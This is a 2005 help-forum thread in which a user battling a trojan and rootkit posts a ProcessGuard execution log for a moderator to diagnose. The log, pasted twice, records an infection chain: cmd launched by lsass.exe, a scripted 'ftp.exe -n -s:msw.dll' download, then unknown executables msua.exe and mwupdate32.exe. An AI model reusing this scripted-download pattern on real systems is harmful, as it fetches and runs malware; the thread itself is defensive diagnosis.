This topic is lockeddoes this mater?
thanks for your help
help i have trojan horse collected.5.L [RESOLVED]
Started by
duglartis
, Jun 09 2005 03:25 AM
#91
Posted 01 August 2005 - 04:00 AM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
does this mater?
thanks for your help
#92
Posted 01 August 2005 - 04:03 AM
Metallica
-
- GeekU Moderator
-
- 33,101 posts
Spyware Veteran
If you use ProcessGuard wisely it will put an end to that.
As I told you before there is only one way to be sure the computer is clean (format)
What I will try to do now is put you in charge of the computer again instead of the rootkit.
Regards,
As I told you before there is only one way to be sure the computer is clean (format)
What I will try to do now is put you in charge of the computer again instead of the rootkit.
Regards,
#93
Posted 02 August 2005 - 02:36 AM
duglartis
- Topic Starter
-
- Member
-
- 159 posts
Member
hello again
i am relunctant to purchase online while my system is still infected here is a log file from PG
Process Guard Log Started---
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1344]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:00:58 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:01:01 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:01:01 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2004]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:01:01 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:01:02 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:01:03 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [608]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:01:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds339aad490a6f574fb273dc16f51a9cd9 ]
Tue 02 - 20:01:42 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf947b6beb664174db9cf14e356862d2e ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa657b0e76eab7c42830993899cea1b13 ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc501c0215fc1c54890ffb847a83913e6 ]
Tue 02 - 20:14:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [700]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:15:10 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
Tue 02 - 20:17:17 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:23:30 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd ]
Tue 02 - 20:23:31 [EXECUTION] "c:\windows\system32\ftp.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3320]
[EXECUTION] Commandline - [ ftp.exe -n -s:msw.dll ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\msua.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3320]
[EXECUTION] Commandline - [ msua.exe ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\mwupdate32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\msua.exe" [3420]
[EXECUTION] Commandline - [ c:\windows\system32\mwupdate32.exe 1804 "c:\windows\system32\msua.exe" ]
Tue 02 - 20:25:34 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k netsvcs ]
Tue 02 - 20:30:48 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Tue 02 - 20:30:59 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1072]
---Process Guard Log Started---
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1336]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:31:50 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1992]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:31:56 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:31:57 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [232]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:31:59 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:32:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4f2296671bff804fa63b64010823e2c2 ]
Tue 02 - 20:32:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb967dced95f59c4d9b71494fea294357 ]
Tue 02 - 20:32:40 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0d7ee5485534404d82ad420d64a146b7 ]
Tue 02 - 20:32:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsab2a85c93f2acb4488b569f4312eb1be ]
Tue 02 - 20:34:06 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:34:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [376]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:35:52 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
thanks for your help
i am relunctant to purchase online while my system is still infected here is a log file from PG
Process Guard Log Started---
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1344]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:00:55 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:00:58 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:01:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:01:01 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:01:01 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2004]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:01:01 [EXECUTION] "c:\progra~1\grisoft\avgfre~1\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:01:01 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:01:02 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:01:03 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:01:03 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [608]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:01:04 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:01:41 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds339aad490a6f574fb273dc16f51a9cd9 ]
Tue 02 - 20:01:42 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf947b6beb664174db9cf14e356862d2e ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa657b0e76eab7c42830993899cea1b13 ]
Tue 02 - 20:01:43 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc501c0215fc1c54890ffb847a83913e6 ]
Tue 02 - 20:14:49 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\program files\processguard\procguard.exe" [700]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Tue 02 - 20:15:10 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_08_2005.txt ]
Tue 02 - 20:17:17 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Tue 02 - 20:23:30 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd ]
Tue 02 - 20:23:31 [EXECUTION] "c:\windows\system32\ftp.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3320]
[EXECUTION] Commandline - [ ftp.exe -n -s:msw.dll ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\msua.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3320]
[EXECUTION] Commandline - [ msua.exe ]
Tue 02 - 20:24:05 [EXECUTION] "c:\windows\system32\mwupdate32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\msua.exe" [3420]
[EXECUTION] Commandline - [ c:\windows\system32\mwupdate32.exe 1804 "c:\windows\system32\msua.exe" ]
Tue 02 - 20:25:34 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k netsvcs ]
Tue 02 - 20:30:48 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Tue 02 - 20:30:59 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1072]
---Process Guard Log Started---
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Tue 02 - 20:31:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1336]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Tue 02 - 20:31:50 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Tue 02 - 20:31:55 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Tue 02 - 20:31:55 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1992]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Tue 02 - 20:31:56 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Tue 02 - 20:31:56 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Tue 02 - 20:31:56 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Tue 02 - 20:31:57 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Tue 02 - 20:31:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [232]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Tue 02 - 20:31:58 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Tue 02 - 20:31:59 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Tue 02 - 20:32:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4f2296671bff804fa63b64010823e2c2 ]
